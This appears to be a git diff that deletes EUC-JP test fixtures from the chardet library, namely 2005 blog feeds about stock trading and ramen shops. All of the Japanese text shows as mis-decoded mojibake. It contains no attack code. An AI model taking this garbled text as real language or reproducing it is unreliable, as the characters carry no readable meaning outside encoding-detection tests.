    -²¡₪·ַּד₪₪₪ע½¦₪ֳ₪ֶ₪₪₪¯₪־₪¬ְµ²ע₪ַ₪¹₪ֽ¡£¡£

    - -


    -ֶ·׀₪ֿ₪³₪³₪¬ְּט₪־ֵ·°ז₪«₪¡ֱ₪ָ₪₪₪¦ֶק₪₪₪עָ¯₪·₪ֶ₪₪₪₪¹₪¬¡¢
    -¼ֲ₪ֿ₪ג₪¦°לֳ³¬ַ¯ֻצ₪ֻ¸‏₪±₪ֶ¶¯₪¯₪¢₪¬₪כ₪־₪ַ₪ֿ₪₪₪₪«₪ָ¡¢÷ַ¶ב¡¢´×₪°₪ֳ₪ֶ
    -₪×₪ך₪₪¹¡£

    - -


    -₪₪¢¡¢²¡₪·ּ₪ע½¦₪ֳ₪ֶ¡¢₪½₪ל₪ַ₪ג¡¡₪·₪¿₪י¡¡₪₪ַ¢₪¢₪₪¹₪כ
    -₪ָ₪₪₪¦ֳ±½ד₪ְן־¬₪עֳֶֿ»₪ֻ₪ה₪כ₪ְ₪±₪ַ₪¹₪ֽ¡£

    - -


    -₪·₪«₪·¡¢÷ַ¶ב¡¢ֻ»₪·₪¹₪®₪כ¡£¡£¡£

    - -


    -¿²₪ֶ₪כ»‏´ײ°³°₪ֿ¥׃¥¸¥ֽ¥¹orֵך»ס₪ע₪·₪ֶ₪₪₪כ¡£¡£¡£

    ]]> - -
    -
    - -₪₪«₪₪« - -2005-10-25T15:27:07Z -2005-10-25T15:24:23Z -tag:blog.kabu-navi.com,2005://1.846 -2005-10-25T15:24:23Z -÷£ֶ₪־¶¯₪₪ֱך¾ל₪ַֽ£°ל²¼₪²₪ֶ₪¿ֽ­³פ₪גֹ³ט₪·₪₪·₪¿¡£¡£ ₪½₪־₪«₪ן₪ך¡¢÷£₪₪ַ₪ט₪¯¾ו₪²... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -÷£ֶ₪־¶¯₪₪ֱך¾ל₪ַֽ£°ל²¼₪²₪ֶ₪¿ֽ­³פ₪גֹ³ט₪·₪₪·₪¿¡£¡£

    - -


    -₪½₪־₪«₪ן₪ך¡¢÷£₪₪ַ₪ט₪¯¾ו₪²₪ֶ₪¯₪ל₪¿₪־₪ֿ₪ֱ₪ח₪ֳ₪ִָהֲµ₪ּ£₪ֻ₪₪ֳ₪ֶ₪­₪ֶ
    -₪₪₪¿₪ך₪·₪₪¹¡£

    - -


    -ְֶּ₪¢₪¿₪ך₪ֻ·₪¯¥¥¸¥·¥ח¥ף₪עִ´ְ°₪¹₪כ₪«₪¡£¡£

    - -


    -÷ַ¶ב¡¢ֻ»₪·₪¯₪ֶ¡¢₪₪«₪₪«¥¶¥י¥׀¸«₪ל₪₪»₪ף¡£

    - -


    -₪₪־₪ַ¡¢ֲחׁ₪ְ₪±₪ֹ¡¢₪³₪¦₪₪₪¦₪ָ₪­₪־‎₪¬¥ׁ¥ױ¥©¡¼¥¥ף¥¹₪¬₪₪₪₪µ₪₪¬
    -₪·₪₪¹¡£

    - -

    - -


    -

    ]]> - -
    -
    - -ֽט½µ₪ֶֿ°₪­₪½₪¦₪µ₪₪¬₪¹₪כ - -2005-10-21T07:45:58Z -2005-10-21T07:41:56Z -tag:blog.kabu-navi.com,2005://1.838 -2005-10-21T07:41:56Z -÷£ֶ₪־ֶ·׀₪ֿ¸וָ¾₪ֻ¶¯₪«₪ֳ₪¿₪ַ₪¹₪ֽ¡£ ֻֽ₪־»‎₪ֱ³פ₪ֿ₪ֿ₪ֳ₪­₪ך₪ָ£³₪ִ₪ֻּ₪ל₪ֶ₪­₪¿¡£ ¡¡... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -÷£ֶ₪־ֶ·׀₪ֿ¸וָ¾₪ֻ¶¯₪«₪ֳ₪¿₪ַ₪¹₪ֽ¡£

    - -


    -ֻֽ₪־»‎₪ֱ³פ₪ֿ₪ֿ₪ֳ₪­₪ך₪ָ£³₪ִ₪ֻּ₪ל₪ֶ₪­₪¿¡£

    - -

    ¡¡¡¦₪°₪ף₪°₪ף¾ו₪¬₪ֳ₪ֶ₪₪₪כ
    -¡¡¡¦₪¢₪₪ךׁ₪ן₪י₪₪₪
    -¡¡¡¦₪ֱ₪ח₪₪²¼₪²

    - -


    -²¼₪²₪¬₪ֱ₪ח₪₪²¼₪²₪₪־₪ַ¥׳¥י¥¹₪¬¿­₪׃₪ֶ₪₪₪כ₪־₪ַ¡¢
    -₪₪¢£ֿ£ֻ₪ָ₪₪₪¦´¶₪¸¡£

    - -


    -ֽט½µ₪ֿ²¼₪²₪ֶ₪₪₪כ₪ג₪־₪ֻ₪ַֿד₪₪ֱ‎₪·¡¢¾ו₪¬₪ֳ₪¿₪ג₪־₪ֿ°לֹפֽר¿©₪₪
    -₪ָ₪₪₪¦ֹק₪ֻ₪₪₪­₪¿₪₪₪¡ֱ₪ָ»׳₪ֳ₪ֶ₪×₪ך₪₪¹¡£

    ]]> - -
    -
    - -ִ´ְ° - -2005-10-19T14:22:46Z -2005-10-19T14:19:28Z -tag:blog.kabu-navi.com,2005://1.798 -2005-10-19T14:19:28Z -₪ֹ₪¦₪ג¡¢ֻ³ֵ×₪ִֻ´ְ°₪ֶֻ‏₪ך₪½₪¦₪ַ₪¹₪ֽ¡£ ₪₪¢¡¢ֵצֱ³₪ָ₪₪₪ֵֿצֱ³¡£ »‎₪ֱ³פ₪ֿ₪₪¼²£₪׀... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -₪ֹ₪¦₪ג¡¢ֻ³ֵ×₪ִֻ´ְ°₪ֶֻ‏₪ך₪½₪¦₪ַ₪¹₪ֽ¡£
    -₪₪¢¡¢ֵצֱ³₪ָ₪₪₪ֵֿצֱ³¡£

    - -


    -»‎₪ֱ³פ₪ֿ₪₪¼²£₪׀₪₪or·₪ב₪ֻ²¼₪²₪¿ִרֵ¡£
    -₪₪₪₪¥¿¥₪¥¥ף¥°₪ע₪₪ֲֶַ¿ַַד₪₪₪ע½ח¼¡ֶ‏₪ל₪ֶ₪₪₪¯´¶₪¸₪ַ₪·₪ח₪¦₪«¡£

    ]]> - -
    -
    - -ֶ·׀₪ֶֿנִ´₪ֻ₪₪ֳ₪ֶ₪­₪¿₪±₪ֹ - -2005-10-18T11:51:46Z -2005-10-18T11:49:16Z -tag:blog.kabu-navi.com,2005://1.797 -2005-10-18T11:49:16Z -ֶ·׀₪ֿ¾¯₪·־ֿ¶¯₪µ₪¬₪₪¯₪₪ֳ₪ֶ₪­₪₪·₪¿₪ֽ¡£ ִ´ְ°₪ֹֿ¬₪÷₪¢₪כ₪־₪ַ₪¢₪¿₪ךֱ°₪ָ₪₪₪ֳ₪¿₪י₪½... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -ֶ·׀₪ֿ¾¯₪·־ֿ¶¯₪µ₪¬₪₪¯₪₪ֳ₪ֶ₪­₪₪·₪¿₪ֽ¡£
    -ִ´ְ°₪ֹֿ¬₪÷₪¢₪כ₪־₪ַ₪¢₪¿₪ךֱ°₪ָ₪₪₪ֳ₪¿₪י₪½₪ל₪₪ַ₪ַ₪¹₪¬¡£¡£¡£

    - -

    ₪µ₪ֶ₪µ₪ֶ¡¢»ה₪־»‎₪ֱ³פ₪ֿ₪₪¾ו¾÷₪«²£₪׀₪₪₪₪־₪ַ₪₪₪₪´¶₪¸₪ַ₪¹¡£
    -₪ה₪ֳ₪ׁ₪ך₪³₪¦₪₪₪¦ֱך¾ל₪־‎₪¬₪ָ₪ך₪ה₪¹₪₪₪¡ב¡£

    - -

    ÷עֲֶ»ְ₪ך₪·₪¿ֱֳּ₪₪ַ¾ו₪¬₪ֳ₪ֶ₪¿₪־₪ֿ¡¢¡¢¡¢₪ְ₪±₪ֹ¡£

    - -


    -

    ]]> - -
    -
    - -»‎₪ֱ³פ₪־£±₪ִ₪¬¹גֶ­₪·₪ֶ - -2005-10-17T13:41:30Z -2005-10-17T13:33:34Z -tag:blog.kabu-navi.com,2005://1.796 -2005-10-17T13:33:34Z -»‎₪ֱ³פ₪־£±₪ִ₪¬₪«₪₪ך¾ו₪¬₪ֳ₪¿₪־₪ַ₪ֱ₪ח₪ֳ₪ָ₪׃₪ֳ₪¯₪ך¡£₪½₪¦₪ֿ₪₪₪ֳ₪ֶ₪ג¡¢ ¥¸¥ך¥¸¥ך²¼₪¬... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -»‎₪ֱ³פ₪־£±₪ִ₪¬₪«₪₪ך¾ו₪¬₪ֳ₪¿₪־₪ַ₪ֱ₪ח₪ֳ₪ָ₪׃₪ֳ₪¯₪ך¡£₪½₪¦₪ֿ₪₪₪ֳ₪ֶ₪ג¡¢
    -¥¸¥ך¥¸¥ך²¼₪¬₪ֳ₪ֶ₪₪₪¿ֱֳּ₪ג₪¢₪ך¡¢₪½₪ל₪ֿLC₪·₪¿¡£

    - -


    -ֻֽ₪ֿ¼«¬₪־¸ֲ³¦¥י¥₪¥ף₪ֳֻ£₪·₪¿ֱֳּ₪ּֿהֵתּµֽׁ₪ַLC₪·₪₪¹¡£
    -₪ְ₪±₪ֹ¡¢₪½₪³₪ַ₪½₪־ֱֳּ₪¬½×₪ן₪ך₪ָ₪₪₪¦₪ן₪±₪ַ₪ֿ₪₪¯¡¢
    -¥¿¥₪¥¥ף¥°₪¬₪ט₪¯ֽ¥°ְּ­₪¬ַ§₪ב₪י₪ל₪ל₪׀÷ֵֶ»²ֶ‏₪·₪₪¹¡£

    - -


    -₪₪¢¡¢₪½₪ף₪´¶₪¸₪ַ÷ַ¶ב₪ֿµ¡³£ֵ×₪ֻ½טֽ‎₪ַ₪­₪ֶ₪₪₪ֶ₪₪«₪₪«
    -₪₪₪₪´¶₪¸₪ַ₪¹¡£

    ]]> - -
    -
    - -÷ַ¸ו₪ֻ¶¯₪«₪ֳ₪¿ֶ·׀¡¢₪₪¿₪ג₪ה - -2005-10-13T06:40:53Z -2005-10-13T06:37:07Z -tag:blog.kabu-navi.com,2005://1.795 -2005-10-13T06:37:07Z -ֶ·׀₪ֿ÷ַ¸ו₪ֻ¶¯₪«₪ֳ₪¿₪ַ₪¹₪ֽ¡£ ₪₪ף₪₪ף₪ַ₪·₪ח₪¦¡£ ₪₪¢¡¢ַד₪₪»‎₪ֱ₪׀₪ֳ₪«₪ך₪₪־₪ַ₪₪... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -ֶ·׀₪ֿ÷ַ¸ו₪ֻ¶¯₪«₪ֳ₪¿₪ַ₪¹₪ֽ¡£

    - -


    -₪₪ף₪₪ף₪ַ₪·₪ח₪¦¡£

    - -


    -₪₪¢¡¢ַד₪₪»‎₪ֱ₪׀₪ֳ₪«₪ך₪₪־₪ַ₪₪₪₪₪ָ₪₪₪₪₪¨₪׀₪₪₪₪₪־₪ַ₪¹₪¬¡¦¡¦¡¦

    - -


    -÷ַ¶ב₪ֵֿך»ס₪ֻ³ה₪¯»‏´ײ₪ֿ°לֶ£±£°¬ִרֵ₪ַ₪¹₪¬¡¢ֵ¬ְ₪ָֻ½ֳַ₪ַ₪­₪ֶ₪₪₪כ
    -¾ל¹ח₪¬ֲ¿₪₪₪ַ₪¹¡£

    - -


    -₪ג₪ֱ₪ם₪ף¡¢¥¥¹₪ג₪¢₪ך₪₪¹₪¬¡¢₪½₪ל₪ג¼ץֶֽ₪ַ₪­₪כ₪ט₪¦₪ֽ¾ֽµ₪¬₪¦₪₪ל₪ֶ₪₪₪כ
    -´¶₪¸₪ג₪¢₪ך¡¢₪₪¢₪₪¢₪₪₪₪₪ַ₪¹¡£

    - -


    -¾ַ₪י₪÷¡¢סב₪י₪÷¡¢₪³₪־ִ´»ׂ₪ַ₪₪₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£
    -

    ]]> - -
    -
    - -·₪¯ַהµׁ - -2005-10-12T08:00:51Z -2005-10-12T07:56:41Z -tag:blog.kabu-navi.com,2005://1.793 -2005-10-12T07:56:41Z -־ֿ¶¯₪µ₪ג¼ךֱֵ₪ֳ₪ֶ¡¢ֽ­³פ₪ֿ¸®ֲ₪¾ו¾÷¡£ ₪₪ְ¡¢»‎₪ֳ₪ֶ₪ֶ₪ג₪₪₪₪₪ף₪־₪ְ₪±₪ֹ¡¢¥״¥¿₪ֿ´ץ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -־ֿ¶¯₪µ₪ג¼ךֱֵ₪ֳ₪ֶ¡¢ֽ­³פ₪ֿ¸®ֲ₪¾ו¾÷¡£

    - -


    -₪₪ְ¡¢»‎₪ֳ₪ֶ₪ֶ₪ג₪₪₪₪₪ף₪־₪ְ₪±₪ֹ¡¢¥״¥¿₪ֿ´ץֻ¾ֵ×´ֲׁ¬₪¬½׀₪כ₪־₪¬
    -₪₪₪ה₪₪־₪ַ¡¢¾¯₪·ֽר¿©₪₪₪ע₪·₪¿ֱֳּ₪ג¡£

    - -


    -´נֵֻ×₪ֻֽר¿©₪₪₪ג¬»¶₪ַ¹װ₪₪₪₪¹¡£

    - -


    -ֽר¿©₪₪₪ע¬»¶₪·₪ֶ¡¢÷ַ¸ו₪ֻ»‎₪ֳ₪ֶ₪₪₪כ¬₪ֿ¥ך¥¹¥¯¥¼¥ם₪ָ₪₪₪¦·ֱ₪¬
    -ֽ‎ֱ₪ְ₪ָ»׳₪ֳ₪ֶ₪₪₪₪¹¡£

    - -


    -₪ג₪ֱ₪ם₪ף¡¢¥¹¥ָ¥ֳ¥׳₪ע¹ֽ־¸₪·₪ֶ₪¬₪₪ָ₪ף₪ֹ₪ַ₪¹₪±₪ֹ¡£¡£

    ]]> - -
    -
    - -¼¡₪ע¹ֽ₪¨₪כ - -2005-10-11T07:36:26Z -2005-10-11T07:29:40Z -tag:blog.kabu-navi.com,2005://1.792 -2005-10-11T07:29:40Z -ֶ·׀₪ֿ־ֿ¶¯₪¯₪¢₪¬₪ך₪₪·₪¿₪ֽ¡£ ְט½µ₪ֻ»ֵ¹‏₪ף₪ְ¬₪ֿ¸®ֲ₪¾ו₪¬₪ֳ₪ֶ₪₪₪₪·₪¿¡£ ₪₪¢¡¢... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -ֶ·׀₪ֿ־ֿ¶¯₪¯₪¢₪¬₪ך₪₪·₪¿₪ֽ¡£

    - -


    -ְט½µ₪ֻ»ֵ¹‏₪ף₪ְ¬₪ֿ¸®ֲ₪¾ו₪¬₪ֳ₪ֶ₪₪₪₪·₪¿¡£

    - -


    -₪₪¢¡¢ֶ·׀₪¬¾ו₪¬₪ל₪׀¾ו₪¬₪כ₪·¡¢²¼₪¬₪ל₪׀²¼₪¬₪כ¡£

    - -


    -₪₪₪ִ₪ג₪־₪³₪ָ₪₪־₪ַ¡¢÷£²ף₪ֿ₪¿₪₪¿₪¾ו₪¬₪כ‎₪ֻ₪₪ֳ₪¿₪ְ₪±₪ַ₪¹₪±₪ֹ₪ֽ¡£

    - -


    -ֻֽ₪־ִ¾¶ב₪־ֻּ¿₪ֿ₪¢₪¯₪₪ַ₪ג¹גֳֽ·ק₪ַ₪־¶ץַה₪ךor¥׳¥ֳ¥ָ₪־ַד₪₪₪ֻ₪¢₪ך₪₪¹¡£

    - -


    -´¶³׀₪ָ₪·₪ֶ₪ֿ£±£±·מ₪°₪י₪₪₪ְ₪ם₪¦₪ֶָ§₪ף₪ַ₪₪₪₪¹₪¬¡¢₪ֹ₪¦₪ַ₪·₪ח₪¦₪«¡£

    - -


    -¾ַ₪י₪÷₪ֻ¹װ₪­₪¿₪₪₪ָ»׳₪₪₪₪¹¡£

    - -


    -₪¢₪ָ¡¢°ֲ״₪־¥ײ¥ם¥°₪ע¬₪±₪ֶ₪₪₪·₪¿¡£

    - -


    -¥¢¥ב¥ײ¥ם₪ע»ָ₪ֳ₪ֶ₪₪¿₪«₪ֳ₪¿₪־₪ָ¡¢°ֲ״₪ֳֶֻ²½₪·₪¿°ױּ£₪־₪¢₪כµ­»צ₪ע÷₪»₪ֶ
    -₪₪₪³₪¦₪«₪₪ָ₪ֱ₪ח₪ֳ₪ָ»׳₪ֳ₪¿₪«₪י₪ַ₪¹¡£

    - -


    -₪ַ₪ג¡¢₪½₪¦₪₪כ₪«₪ֿ¬₪«₪ך₪₪»₪ף₪±₪ֹ¡¢¡¢¡¢

    - -


    -

    ]]> - -
    -
    - -²¡₪·ּ₪ֶָ§₪ף₪ַ - -2005-10-07T08:00:56Z -2005-10-07T07:55:13Z -tag:blog.kabu-navi.com,2005://1.789 -2005-10-07T07:55:13Z -²¡₪·ּ₪ְ₪ם₪¦₪ָ£²¡₪£³ֱֶ°₪«₪י¥³¥ִ¥³¥ִ»ֵ¹‏₪ף₪ַ₪­₪ֶ¡¢ ₪₪₪₪´¶₪¸₪ֻ₪₪ֳ₪ֶ₪­₪ֶ₪₪₪כ¡£ ... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -²¡₪·ּ₪ְ₪ם₪¦₪ָ£²¡₪£³ֱֶ°₪«₪י¥³¥ִ¥³¥ִ»ֵ¹‏₪ף₪ַ₪­₪ֶ¡¢
    -₪₪₪₪´¶₪¸₪ֻ₪₪ֳ₪ֶ₪­₪ֶ₪₪₪כ¡£

    - -


    -₪¿₪ְ¡¢÷ַ¶ב₪־ֽנ¹ג²¼¡¢₪ִ₪₪ך¥¥י¥ֶ¥£¥ֶ¥£¥ֶ¡¼₪¬ֲח₪­₪¹₪®₪כ₪־₪ַ¡¢
    -£·¬ַד₪₪₪ָ₪₪₪ֳ₪¿₪ָ₪³₪ם₪ַ₪ָ₪ֹ₪ב₪ט₪¦₪ָ₪×₪ג₪¦¡£

    - -


    -ִ¾¶ב₪־ֲח₪­₪¥ֱ¥ד¥ף¥¹₪ֿ¥ְ¥ײ¥כ¥ָ¥ֳ¥׳₪ַ₪־¶ץַה₪ך₪ְ₪ם₪¦₪±₪ֹ¡¢
    -₪³₪־₪₪²¼₪²₪כ₪³₪ָ₪ג₪¢₪כ₪־₪¬³פ¼°»װ¾ל₪־ֹ₪µ¡£

    - -


    -₪₪¢¡¢²¼₪¬₪ֳ₪¿₪י₪µ₪ֳ₪µ₪ֶָ¨₪²₪ֶ¡¢₪₪¿»ֵ¹‏₪א₪ְ₪±₪₪־₪ְ₪¬¡¢
    -₪ֹ₪¦₪₪כ₪³₪ָ₪ַ₪·₪ח₪¦¡£

    - -


    -₪¢₪₪ך°ל´מ°לֽ«₪ֿ₪·₪₪₪₪ט₪¦₪ֻ₪·₪ֶ₪₪¹¡£

    - -


    -´נֵֻ×₪ֻ¡£

    - -


    -₪·₪«₪·¡¢¥ֹ¥ך¥ֶ¥¯¡4840¡ֻ¥¥כ¥ְ¡¼₪ֿ²ִ°¦₪½₪¦₪ַ₪¹₪ֽ¡£¡£¡£
    -²‏₪ב₪ֶ¡¢ֱֳּ₪־²¼ֳֽ¥ך¥¹¥¯₪־³־ַ§₪־ֲח»צ₪µ₪עִֻ´¶₪·₪₪¹₪ן¡£

    ]]> - -
    -
    - -ֳ»´²¡₪·ְֱּ₪₪ - -2005-10-06T07:51:21Z -2005-10-06T07:47:22Z -tag:blog.kabu-navi.com,2005://1.787 -2005-10-06T07:47:22Z -₪ֹ₪¦₪גְּט₪־ֵ·°ז₪¬₪½₪ם₪½₪ם₪­₪½₪¦₪ַ₪¹₪ֽ¡£ ֲחֲ־¡¢₪³₪¦₪₪₪¦¥±¡¼¥¹₪ַ₪ֿ₪ג₪¦°ל²ף¾ו₪¬₪ך... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -₪ֹ₪¦₪גְּט₪־ֵ·°ז₪¬₪½₪ם₪½₪ם₪­₪½₪¦₪ַ₪¹₪ֽ¡£

    - -


    -ֲחֲ־¡¢₪³₪¦₪₪₪¦¥±¡¼¥¹₪ַ₪ֿ₪ג₪¦°ל²ף¾ו₪¬₪ך₪₪¹₪«₪י¡¢²¡₪·ּ₪ֻ₪₪ֳ₪ֶ₪₪₪כ
    -ֱֳּ₪ע½¦₪¦₪ָ¾¡₪ֶ₪כ²ִַ½ְ­₪¬¹ג₪₪₪ַ₪¹¡£

    - -


    -₪₪־₪ַ¡¢¶ץַה₪ך₪ֿ₪₪ַד₪₪ּב₪·₪ע₪·₪ֶ¡¢²¡₪·ַּד₪₪₪ֻ·¹ֵ₪·₪ֶ₪₪¹¡£

    - -


    -₪¿₪ְ₪·¡¢ֲח₪­₪ִ´ְ°₪¬₪­₪¿¾ל¹ח₪ָֻק₪¨₪ֶ¡¢ֱ´־ֿ₪ַ₪־ַד₪₪₪ֽֿ₪¨₪ֶ¡¢
    -₪₪¹¡£

    - -


    -

    ]]> - -
    -
    - -₪׀₪ֳ₪ֱ₪ך₪ֿ₪₪כ - -2005-10-05T09:46:08Z -2005-10-05T09:43:18Z -tag:blog.kabu-navi.com,2005://1.786 -2005-10-05T09:43:18Z -÷£ֶ₪ֿ₪׀₪ֳ₪ֱ₪ך₪ֿ₪₪ך¡¢ ¡¡¡¦¾¡₪ֳ₪ֶ₪כ₪ג₪־₪ֿ½חִ´₪ֻ¾ו₪¬₪ך¡¢ ¡¡¡¦ַה₪ֳ₪ֶ₪₪₪כ₪ג₪־₪ֿ½ח... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -÷£ֶ₪ֿ₪׀₪ֳ₪ֱ₪ך₪ֿ₪₪ך¡¢

    - -


    -¡¡¡¦¾¡₪ֳ₪ֶ₪כ₪ג₪־₪ֿ½חִ´₪ֻ¾ו₪¬₪ך¡¢

    - -

    ¡¡¡¦ַה₪ֳ₪ֶ₪₪₪כ₪ג₪־₪ֿ½חִ´₪ֻ²¼₪¬₪ך

    - -


    -₪ָ₪₪₪¦ֶ₪ַ₪·₪¿¡£

    - -


    -₪³₪¦₪₪₪¦²¡₪·¹ח₪ֳ₪ֶ₪₪₪כֵ¸³«₪ֿ₪ָ₪ך₪ה₪¹₪₪₪¡¼¡¢ֻֽ₪־¥¹¥¿¥₪¥כ₪ָ₪·₪ֶ₪ֿ₪ַ₪¹₪±₪ֹ¡£

    - -


    -₪₪¢¡¢₪ְ₪«₪י₪ֹ₪¦₪ֳ₪ֶ₪³₪ָ₪ג₪₪¯¡¢ֽר³־₪ָ»ֵ¹‏₪₪ע₪₪₪ִ₪ג₪ֹ₪×₪ך¡¢
    -ֲחֲ־£±£°¬₪°₪י₪₪₪ַ÷ׁ₪₪»₪₪·₪¿¡£

    - -


    -÷£ֶ₪ֿ₪³₪ל₪«₪י₪־₪¡£
    -ָ©´¨₪¯₪₪ֳ₪ֶ₪­₪¿₪־₪ַ¡¢ֳָ₪«₪₪₪ג×₪¬₪×₪₪₪·₪¯ִ÷₪±₪½₪¦¡£

    ]]> - -
    -
    - -₪₪₪ִ₪ג₪ֶָ±₪¸₪³₪ָ₪ע - -2005-10-04T08:05:55Z -2005-10-04T08:01:07Z -tag:blog.kabu-navi.com,2005://1.781 -2005-10-04T08:01:07Z -ֵך»ס₪ַ₪ֿ₪₪₪ִ₪ג₪ֶָ±₪¸₪³₪ָ₪עֶ±₪¸₪ט₪¦₪ֻ₪ַ₪­₪כ₪³₪ָ₪¬₪ָ₪ֶ₪גֲחְ₪₪³₪ָ₪ְ₪ָ »׳₪¦¡£ ¥ך... - -kabunavi -http://www.kabu-navi.com -info@kabu-navi.com - -¥¹¥₪¥ף¥°¥ָ¥ל¡¼¥ֹ - -ֵך»ס₪ַ₪ֿ₪₪₪ִ₪ג₪ֶָ±₪¸₪³₪ָ₪עֶ±₪¸₪ט₪¦₪ֻ₪ַ₪­₪כ₪³₪ָ₪¬₪ָ₪ֶ₪גֲחְ₪₪³₪ָ₪ְ₪ָ
    -»׳₪¦¡£

    - -


    -¥ך¥¹¥¯₪עµצֶֽ₪·¡¢₪₪₪ִ₪ג₪ֶָ±₪¸₪³₪ָ₪ע₪¹₪כ¡£

    - -


    -₪¿₪ְ₪½₪ל₪ְ₪±¡£

    - -


    -´ֳ±₪₪ט₪¦₪ְ₪±₪ֹ¡¢·כ¹½ֶס₪·₪«₪ֳ₪¿₪ך₪·₪₪¹¡£

    - -

    - -

    ₪₪₪ִ₪ג₪ֶָ±₪¸₪ט₪¦₪ַֻה₪כ₪ג₪־₪ַֿה₪ך¡¢ַד₪¦₪ג₪־₪ַֿד₪ֳ₪ֶ₪₪₪כ¡£
    -ֶ±₪¸₪³₪ָ₪ע₪·₪ֶ₪₪₪כ₪־₪ְ₪±₪₪ף₪ְ₪±₪ֹ¡¢´°ֱ´₪ֻ¶²ֹ¿´₪¬µ¿¿´₪ע¼ט§₪¦₪ָ₪³₪ם₪₪ַ₪ֿ
    -₪₪₪±₪ֶ₪₪₪₪₪₪¡ֱ¡£

    - -


    -₪₪¢¡¢ֶ¡¹ְ÷¿₪ַ₪¹₪ֽ¡£

    ]]> - -
    -
    - -
    \ No newline at end of file diff --git a/chardet/tests/EUC-JP/bphrs.net.xml b/chardet/tests/EUC-JP/bphrs.net.xml deleted file mode 100644 index 275bdde..0000000 --- a/chardet/tests/EUC-JP/bphrs.net.xml +++ /dev/null @@ -1,263 +0,0 @@ - - - - - -₪ב₪·¡ק₪ם₪° - -http://www.bphrs.net/mesi/ - -since 2004.10]]> -ja - - -2005-12-26T19:45:28+09:00 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -¥¹¥¥·¥ד¥כ -http://www.bphrs.net/mesi/archives/2005/12/post_123.html - ₪¢₪ף₪«₪±¥ׁ¥¹¥¿ְלּחֵ¹ SAKURA ... - - - -³°₪ב₪· -bphrs - -2005-12-26T19:45:28+09:00 - - - -¥י¡¼¥ב¥ףֲחְ¹ -http://www.bphrs.net/mesi/archives/2005/11/post_122.html - ²£¹ֻ ... - - - -³°₪ב₪· -bphrs - -2005-11-30T15:36:25+09:00 - - - -₪·₪ו₪¦₪ז₪י¡¼₪ב₪ף -http://www.bphrs.net/mesi/archives/2005/11/post_121.html - ·§¸ֿ÷ TWIN21 ... - - - -³°₪ב₪· -bphrs - -2005-11-08T16:19:40+09:00 - - - -¥ִ¥¥µ¥י¥ְ₪¦₪ֹ₪ף -http://www.bphrs.net/mesi/archives/2005/08/post_120.html - ₪µ₪¬₪ ... - - - -³°₪ב₪· -bphrs - -2005-08-15T20:04:49+09:00 - - - -¾ֶֶש -http://www.bphrs.net/mesi/archives/2005/08/post_119.html - ¥ָ¥¥¹¥¡¼¥ָ ... - - - -³°₪ב₪· -bphrs - -2005-08-15T03:26:14+09:00 - - - -¥ׁ¥¯¿¹¥«¥ל¡¼ -http://www.bphrs.net/mesi/archives/2005/08/post_118.html - ¥ׁ¥¯¿¹ ... - - - -³°₪ב₪· -bphrs - -2005-08-03T12:44:40+09:00 - - - -¾®¥י¡¼¥ב¥ף -http://www.bphrs.net/mesi/archives/2005/08/post_117.html - ¥י¡¼¥ב¥ףֶףֿ÷ ... - - - -³°₪ב₪· -bphrs - -2005-08-02T23:07:14+09:00 - - - -¥¢¥¸₪־³«₪­ִך¿© -http://www.bphrs.net/mesi/archives/2005/07/post_116.html - ַ¼ֶ¦₪־₪» ... - - - -³°₪ב₪· -bphrs - -2005-07-29T12:16:40+09:00 - - - -¥¥¹¥¡¼¥ָ¥¹¥ׁ¥²¥ֳ¥ֶ¥£¡¼ -http://www.bphrs.net/mesi/archives/2005/07/post_115.html - µ׳₪·₪ײ₪ך ... - - - -³°₪ב₪· -bphrs - -2005-07-15T21:00:36+09:00 - - - -ֶשֶ‏₪ך¥י¡¼¥ב¥ף -http://www.bphrs.net/mesi/archives/2005/05/post_114.html - ¥¹¥¬¥­¥ה ... - - - -³°₪ב₪· -bphrs - -2005-05-06T17:56:06+09:00 - - - -¥י¡¼¥ב¥ףֲחְ¹¡²¹ְפ₪¿₪₪´ -http://www.bphrs.net/mesi/archives/2005/04/post_113.html - ₪₪ף₪ִ₪ֳִג ... - - - -³°₪ב₪· -bphrs - -2005-04-23T18:48:13+09:00 - - - -ֲחְ¹¥י¡¼¥ב¥ף -http://www.bphrs.net/mesi/archives/2005/04/post_112.html - ֵלµ‏¥י¡¼¥ב¥ף ֶײ₪ֱ₪ף ... - - - -³°₪ב₪· -bphrs - -2005-04-22T23:02:51+09:00 - - - -¥י¡¼¥ב¥ף₪ָ₪´ָ׃ -http://www.bphrs.net/mesi/archives/2005/04/post_111.html - °לָײ¡₪׃₪ֳ₪¯₪ך¥י¡¼¥ב¥ף¡ֻ ... - - - -³°₪ב₪· -bphrs - -2005-04-19T21:07:15+09:00 - - - -»×₪־±צ¾ֶ₪­ִך¿© -http://www.bphrs.net/mesi/archives/2005/04/post_110.html - ₪₪־₪ךִג ... - - - -³°₪ב₪· -bphrs - -2005-04-19T08:30:28+09:00 - - - -÷²₪־¥י¡¼¥ב¥ף -http://www.bphrs.net/mesi/archives/2005/04/post_109.html - ָרֶ»¥י¡¼¥ב¥ףּֽ°ל¶... - - - -³°₪ב₪· -bphrs - -2005-04-02T18:49:14+09:00 